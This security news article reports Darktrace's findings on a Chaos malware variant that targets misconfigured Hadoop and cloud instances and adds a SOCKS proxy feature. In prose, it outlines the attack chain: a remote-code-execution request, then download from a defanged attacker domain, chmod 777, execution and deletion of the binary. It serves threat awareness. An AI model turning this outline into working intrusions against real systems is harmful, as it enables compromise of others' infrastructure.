Emerging Chaos Malware Variant Exploits Cloud Vulnerabilities with Enhanced Proxy Capabilities
Cybersecurity experts have identified a new iteration of the Chaos malware, now targeting misconfigured cloud environments and introducing advanced proxy functionalities. This development signifies a strategic shift in the malware’s operational focus, extending beyond its traditional targets of routers and edge devices.
Initially documented by Lumen Black Lotus Labs in September 2022, Chaos is a cross-platform malware capable of infiltrating both Windows and Linux systems. Its capabilities include executing remote shell commands, deploying additional modules, propagating through SSH key brute-forcing, mining cryptocurrency, and launching distributed denial-of-service (DDoS) attacks via multiple protocols such as HTTP, TLS, TCP, UDP, and WebSocket.
The malware is believed to have evolved from Kaiji, another DDoS-focused malware known for exploiting misconfigured Docker instances. While the exact identity of the operators remains unknown, indicators such as the use of Chinese language characters and China-based infrastructure suggest a possible Chinese origin.
Darktrace’s recent observations revealed that this new Chaos variant targeted their honeypot network, specifically a deliberately misconfigured Hadoop instance vulnerable to remote code execution. The attack began with an HTTP request to the Hadoop deployment, aiming to create a new application. This application contained shell commands designed to download a Chaos agent binary from an attacker-controlled server (pan.tenire[.]com), modify its permissions to allow execution by all users (chmod 777), execute the binary, and subsequently delete the artifact to minimize forensic evidence.
Notably, the domain pan.tenire[.]com was previously associated with an email phishing campaign by the Chinese cybercrime group Silver Fox, known as Operation Silk Lure, which distributed decoy documents and ValleyRAT malware.
The 64-bit ELF binary of this Chaos variant has undergone significant restructuring, retaining its core functionalities while introducing notable changes. One major modification is the removal of features that facilitated propagation via SSH and exploitation of router vulnerabilities. In their place, a new SOCKS proxy feature has been added, enabling compromised systems to relay traffic. This addition obscures the true origin of malicious activities, complicating detection and mitigation efforts for cybersecurity defenders.
Darktrace’s analysis indicates that several functions previously inherited from Kaiji have been altered, suggesting extensive rewriting or refactoring of the malware. The incorporation of the proxy feature likely reflects the threat actors’ intent to diversify the botnet’s monetization strategies beyond cryptocurrency mining and DDoS-for-hire services. By offering a broader range of illicit services, they aim to remain competitive in the cybercrime market.
The continuous evolution of Chaos underscores the commitment of cybercriminals to expand their botnets and enhance their capabilities. The recent trend of integrating proxy services into botnets like AISURU and Chaos indicates that the threat landscape is evolving, with denial-of-service attacks no longer being the sole concern for organizations and their security teams.
